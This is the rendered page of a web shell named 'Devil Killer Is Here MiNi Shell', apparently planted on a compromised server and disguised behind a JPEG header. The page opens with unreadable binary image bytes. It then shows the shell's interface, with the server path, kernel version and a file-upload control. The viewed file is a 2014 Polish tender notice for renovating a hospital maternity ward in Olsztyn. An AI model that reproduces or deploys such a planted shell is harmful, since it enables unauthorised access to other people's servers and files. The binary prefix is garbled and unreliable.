JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141209/403034-N-2014.html

<p class="kh_header"><b>Olsztyn: Remont i przebudowa oddziału położniczego z pomieszczeniami dla noworodków i wcześniaków oraz traktem porodowym w Miejskim Szpitalu Zespolonym w Olsztynie</b><br>
<b>Numer ogłoszenia: 403034 - 2014; data zamieszczenia: 09.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa oddziału położniczego z pomieszczeniami dla noworodków i wcześniaków oraz traktem porodowym w Miejskim Szpitalu Zespolonym w Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania pt. Remont  i przebudowa oddziału położniczego z pomieszczeniami dla noworodków w wcześniaków  oraz traktem porodowym w Miejskim Szpitalu Zespolonym w Olsztynie.
Informacje ogólne:
Wykonawca zobowiązany jest do wykonania robót na podstawie:
1.	Pozwolenia na budowę
2.	Projektu budowlano-wykonawczego
3.	Specyfikacji
4.	Przedmiarów robót
Prace powinny być wykonane zgodnie z załączoną do niniejszej Specyfikacji dokumentacją.
UWAGA !
WYKONAWCA MUSI UWZGLĘDNIĆ FAKT ŻE PRACE REMONTOWE PROWADZONE BĘDĄ W BUDYNKU CZYNNEGO SZPITALA. W 1 ETAPIE INWESTOR UDOSTĘPNI II  PIĘTRO DO REMONTU, W 2 ETAPIE INWESTOR UDOSTĘPNI III  PIĘTRO DO REMONTU.  Ponadto nie ma możliwości organizacji placu budowy przy budynku, należy uwzględnić konieczność organizacji placu budowy oddalonego od remontowanego budynku.
	Pomieszczenia objęte opracowaniem mieszczą się w Pawilonie Ginekologiczno- Położniczym połączonym przejściami z głównym budynkiem Szpitala Miejskiego.
      Oddział Położniczy z pomieszczeniami dla noworodków i wcześniaków zlokalizowany jest na II piętrze budynku. Powierzchnia użytkowa tego oddziału wynosi 448.60 m2. Na oddziale tym zaprojektowano salę na 5 stanowisk intensywnej opieki noworodków i wcześniaków poprzedzoną śluzą  umywalkowo- fartuchową . 7 sal chorych z łazienkami o łącznej liczbie 12 łóżek oraz szereg niezbędnych, specjalistycznych pomieszczeń. We wszystkich pomieszczeniach na II piętrze przewidziano wentylację grawitacyjną  oraz dodatkowo klimatyzatory.
       Trakt porodowy z salą cięć cesarskich i pozostałymi pomieszczeniami zlokalizowany jest na III piętrze budynku. Powierzchnia użytkowa tego oddziału wynosi 355,50 m2.  Na tej kondygnacji  planuje się wykonanie remontu pomieszczeń w zakresie; wykonanie śluzy umywalkowo- fartuchowej przed wejściem na trakt porodowy, zmianę lokalizacji sali cięć cesarskich ze względu na poprawienie funkcjonalności względem pozostałych pomieszczeń, wykonanie 4 sal porodowych.
Ponadto przewidziano: pokoje przygotowawcze lekarzy , pomieszczenia socjalne, łazienkę personelu, brudownik i pomieszczenie porządkowe. We wszystkich pomieszczeniach na III piętrze zastosowana będzie wentylacja  nawiewno-wywiewna. W sali cięć cesarskich zastosowany będzie strop laminarny.
 Zakres prac budowlanych
Ściany:
wypełnienia ściany zewnętrznej, jako warstwowe z bloczka betonu komórkowego z izolacją termiczną i tynkiem cienkowarstwowym.
Ściany samonośne wewnętrzne:
wykonane będą z bloczków betonu komórkowego o grubości 12 cm z odmian 600 i 500.
W miejscach przeszkleń wbudowanych w ścianę i nad drzwiami wykonać ścianę w lekkiej zabudowie wykonanej z płyt gipsowo- włóknowych na szkielecie  stalowym z wypełnieniem wełną mineralną o całkowitej grubości 10 cm. 
Wszystkie ściany wewnętrzne ( również przeszklone ) powinny spełniać odpowiednią klasę odporności ogniowej dla budynku B (tj. min. EI 30).
Tynki:
 należy wykonać uzupełnienia ubytków ścian i stropów zatartą na gładko masą do wykonywania gładzi gipsowych, produkowaną na bazie mączki anhydrytowej z wypełniaczami. Oraz dodatkami modyfikującymi.
Posadzki i izolacje przeciwwilgociowe: 
podłogi we wszystkich pomieszczeniach należy skuć istniejące warstwy posadzkowe , powierzchnię oczyścić i wyrównać. Wykonać wylewkę samopoziomującą  na  warstwie gruntującej. We wszystkich pomieszczeniach mokrych należy wykonać izolację przeciwwilgociową.
Posadzki - wykładzina: 
należy wykonać z materiałów umożliwiających ich mycie i dezynfekcję . Prace wykonywać zgodnie z projektem i warunkami technicznymi wykonania i odbioru robót.
Posadzki gresowe:
Wykonać z materiałów umożliwiających ich mycie i dezynfekcję. Dostosować do wymagań szczegółowo opisanych w projekcie. Odstępstwo nie jest możliwe bez uzgodnień z Projektantem. 
Wykończenie ścian wewnętrznych:
Projektowanie pomieszczenia gabinetów  zabiegowych, sal porodowych, sal noworodków etc. - malowanie ,ścian farbą bakteriobójczą na tapecie z włókna szklanego. Projektowane pomieszczenia, korytarze, części wspólne, ciągi komunikacyjne - malowanie ścian farbą bakteriobójczą na tapecie z włókna szklanego.
Projektowane pomieszczenia biurowe, magazynowe, porządkowe i gospodarcze malować zgodnie z projektem tak co do materiałów malarskich jak i kolorystyki.
Wykończenie ścian płytkami:
Projektuje się skucie istniejącej glazury oraz wyrównanie istniejących powierzchni i wg oznaczeń na rysunkach ,projektuje się nowe okładziny z płytek gresowych. Dostosować się do projektu kolorystyki. Każda zmiana jednego z koloru powoduje zmianę innych kolorów q zadanym zakresie projektu co należy skonsultować z projektantem.
Sufity podwieszane
Systemowy sufit podwieszany wykonać w klasie odporności na korozję C3 o łącznej przybliżonej wadze 2,5 kg. Sufity należy wykonać w sposób zapewniający szczelność powierzchni   oraz umożliwiający ich mycie i dezynfekcję.
Stolarka ;
Drzwi wewnętrzne, pełne, przeszklone, witryny - ścianki szklane, szklenie w ścianie, okna i drzwi przeszklone(przezroczyste), wykonać dokładnie zgodnie z projektem.
Zakres prac sanitarnych
- montaż instalacji kanalizacji
- montaż instalacji ciepłej i zimnej wody użytkowej, cyrkulacji
- montaż instalacji c.o.
- montaż instalacji ciepła technologicznego
- montaż instalacji wentylacji mechanicznej i klimatyzacji
- biały montaż
- montaż instalacji gazów medycznych oraz instalacji sygnalizacji świetlno-akustycznej
- montaż paneli nadłóżkowych oraz sufitowo-mostowego
- demontaż istniejących elementów instalacji grzewczej, wodnej i kanalizacyjnej
Uwaga! 
Duża ilość prac realizowana będzie na poziomie niższej kondygnacji (w tym także pod stropem kondygnacji I piętra, nie objętej podstawowym zakresem opracowania).
Przedmiotowa część budynku, posiada instalację grzewczą, zwu/cwu/cyrk oraz kanalizacji sanitarnej. Występują lokalne klimatyzatory typu Split
Instalacja kanalizacji sanitarnej:
Włączenia do istniejących instalacji KS, należy wykonać poprzez trójniki i mufkę połączeniową PVC, a w przypadku żeliwa, specjalne przejście żeliwo-PVC.
W budynku zaprojektowano instalację kanalizacyjną z rur PP-HT o połączeniach kielichowych z uszczelkami gumowymi
Instalacja kanalizacji sanitarnej prowadzona będzie do istniejącej sieci kanalizacji sanitarnej poprzez istniejące przyłącza kanalizacyjne.
Instalacja wody zimnej, ciepłej i użytkowej:
Instalację zwu/cwu/cyrk. należy wykonać z: rur wielowarstwowych PE-RT/Al/PE-RT Multi Universal, przeznaczone do instalacji wody zimnej o parametrach 20 °C i ciśnieniu 10 bar, ciepłej użytkowej o parametrach 70 °C i ciśnieniu 10 bar), oraz centralnego ogrzewania
Rury stalowe ocynkowane ze szwem gwintowane średnie wg. PN-74/H-74200.- zasilenia instalacji ppoż.(poza zakresem) oraz połączenia z istniejącą instalacją
Jako izolację rurociągów należy stosować izolację z pianki poliuretanowej
Instalacja centralnego ogrzewania i ciepła technologicznego:
Instalacja ciepła technologicznego realizowana będzie z istniejących rozdzielaczy, poprzez wymiennik
	glikol/woda.
Zaprojektowano grzejniki stalowe płytowe higieniczne
Projekt przewiduje wykonanie układu ciepła technologicznego na obiegu glikolowym (glikol
	propylenowy 42%)
	Instalacja chłodzenia pomieszczeń:
Celem chłodzenia pomieszczeń zaprojektowano instalację freonową w oparciu o urządzenia Multisplit oraz systemy Split.
Instalacja freonowa realizowana będzie z rur miedzianych chłodniczych łączonych poprzez lutowanie.
Zaprojektowano 2  centrale wentylacyjnych
Projekt przewiduje wentylację mechaniczną wywiewną dla pomieszczeń WC i pomieszczeń pomocniczych.
Projekt przewiduje wentylację mechaniczną nawiewno-wywiewną dla pomieszczeń biurowych i porodowych kondygnacji III piętra
Projekt przewiduje wentylację mechaniczną nawiewno-wywiewną dla pomieszczeń Sali cięć cesarskich oraz pomieszczeń pomocniczych przy Sali.
Czerpnie zlokalizowane zostały ponad dachem
Wyrzutnie zostały zlokalizowane jako zintegrowane z centralą
Zakres prac elektrycznych
W remontowanych pomieszczeniach należy wykonać następujące instalacje:
instalacja oświetlenia i gniazd wtyczkowych ogólnego przeznaczenia
instalacje oświetlenia awaryjnego 
instalację oświetlenia nocnego
oświetlenie ewakuacyjne  ( niezależne obwody )
instalację nadzoru opraw oświetlenia awaryjnego i ewakuacyjnego
instalacja siłowa 
instalacja odgromowa
instalacja zasilania obwodów  pomieszczeń medycznych grupy 2 - instalacje obejmują obwody w Sali Cięć Cesarskich, Sal porodowych, Sali pooperacyjnej oraz Sali przygotowania pacjenta. Odbiory należy zasilić z modułów zasilająco- sterujących firmy BENDER ( rozbudowa istniejącego systemu ) poprzez transformatory i UPS. Moduły należy połączyć z konwerterem , znajdującym się w szafie zasilającej Głównej Izby Przyjęć Szpitala. 
instalację wyrównawczą
instalację zasilania sygnalizatorów gazów medycznych
instalację sygnalizacji pożaru
instalację przyzywową w niezbędnym zakresie ( instalacja typu ACCERMAN - rozbudowa istniejącego w Szpitalu systemu )
instalację sieci LAN
instalacja telefoniczna
przebudować Główną Rozdzielnię elektryczną budynku
wykonać instalację wraz z wyłącznikami ppoż
tablice rozdzielcze obwodów podstawowych i rezerwowanych
Uwaga!
I.	Należy przewidzieć roboty i prace nie objęte zakresem opracowanego projektu, a konieczne do utrzymania w pełnej sprawności instalacji istniejących na kondygnacjach nie wchodzących w zakres  remontu. Związane jest to z przepięciem istniejących instalacji do urządzeń i rozdzielni nowoprojektowanych.
II.	Ilekroć w dokumentacji projektowej wskazano producenta materiałów lub są użyte nazwy handlowe produktów, które zaleca się stosować do realizacji przedmiotu zamówienia, oznacza to, iż wskazano przykładowe wyroby i parametry lub właściwości minimalne jakim ma odpowiadać dany produkt. W takich przypadkach przy sporządzaniu oferty stosować należy zasadę równoważności dla tych produktów.     
Materiały równoważne
Zamawiający dopuszcza zaoferowanie materiałów równoważnych, tj. materiałów o nie gorszych
i odpowiadających parametrom jakościowym materiałom wyszczególnionym w dokumentacji przetargowej, różniącym się od wskazanych jedynie nazwą. Wykonawca, który będzie powoływał się na rozwiązania równoważne opisywanym przez Zamawiającego, zgodnie z art. 30 ust. 5 ustawy, jest obowiązany wykazać, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego. 
2. Szczegółowy zakres robót określają przedmiary robót i dokumentacja projektowa - załącznik nr 3 do SIWZ
3. Szczegółowe zasady realizacji zamówienia określa załącznik nr 2 do SIWZ - projekt umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.54.40-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium .
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 76 000,00 PLN ( słownie:  siedemdziesiąt sześć tysięcy złotych ):
3. Wykonawca wnosi wadium: 
3.1	w pieniądzu, poleceniem przelewu na konto: 
Miejskiego Szpitala Zespolonego w Olsztynie, ul. Niepodległości 44, NORDEA BANK POLSKA S.A. Oddział w Olsztynie nr 08 14401228 0000 0000 0189 0786 z dopiskiem: wadium w  przetargu DZZ-382-58/14 (Remont i przebudowa ), przed upływem terminu składania ofert. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert, zaś dowód wniesienia wadium może być dołączony do oferty. Kasa Miejskiego Szpitala Zespolonego w Olsztynie wadium nie przyjmuje.
3.2	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3.3	w gwarancjach ubezpieczeniowych
3.4	w gwarancjach bankowych
3.5	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z p. zm.) sposób przekazania: przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunku nastąpi na podstawie dokumentu o którym mowa w rozdziale VI A lit. pkt 1 ppkt 1.1 specyfikacji istotnych warunków zamówienia tj. oświadczenia z art. 22 ust. 1 pkt.1-4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga posiadania niezbędnej wiedzy i doświadczenia w zakresie realizacji minimum trzech robót odpowiadającej rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 1 000 000,00 PLN (słownie: jeden milion złotych brutto) każda robota. Zamawiający wymaga, aby roboty te dotyczy  obiektów użyteczności publicznej. Ocena spełniania ww. warunku nastąpi na podstawie dokumentów o których mowa w rozdziale VI. lit A. pkt.1 ppkt. 1.2 specyfikacji istotnych warunków zamówienia tj.: 1.2. Wykazu minimum trzech robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert wykonanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty  oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Zamawiający wymaga, aby roboty te dotyczyły obiektów użyteczności publicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunku nastąpi na podstawie dokumentu o którym mowa w rozdziale VI A lit. pkt 1 ppkt 1.1 specyfikacji istotnych warunków zamówienia tj. oświadczenia z art. 22 ust. 1 pkt.1-4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunku nastąpi na podstawie dokumentu o którym mowa w rozdziale VI A lit. pkt 1 ppkt 1.1 specyfikacji istotnych warunków zamówienia tj. oświadczenia z art. 22 ust. 1 pkt.1-4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w zakresie tego warunku nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunku nastąpi na podstawie dokumentu o którym mowa w rozdziale VI A lit. pkt 1 ppkt 1.1 specyfikacji istotnych warunków zamówienia  tj. oświadczenia z art. 22 ust. 1 pkt.1-4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga wskazania w wykazie i załączenie dowodów w następującym zakresie: realizacji minimum trzech robót odpowiadającej rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 1 000 000,00 PLN (słownie: jeden milion złotych brutto) każda robota. Zamawiający wymaga, aby roboty te dotyczy  obiektów użyteczności publicznej. Dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty  oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Zamawiający wymaga, aby roboty te dotyczyły obiektów użyteczności publicznej.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty dodatkowe:
1. Sporządzony i podpisany przez wykonawcę, według wzoru stanowiącego załącznik nr 1 do SIWZ, 
   Formularz ofertowy.
2. Dwa egzemplarze Kosztorysów  ofertowych (oryginał i kopia)
3. Dowód wniesienia wadium.
4. UWAGA!!! Zaleca się, aby kosztorys ofertowy był załączony do oferty również w wersji elektronicznej na płycie CD/DVD/Pamięci flash</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy oraz warunki zmian, zawarto we wzorze umowy, który stanowi załączniki numer 2 do SIWZ.
2. Zmiana umowy:
2.1. Wszelkie zmiany zapisów umowy ( w tym zmiany istotne) winny być dokonywane w formie pisemnej (aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony w Olsztynie
ul. Niepodległości 44
Dział  Zaopatrzenia i Zamówień Publicznych, pokój nr 25
10-045  Olsztyn.</p>
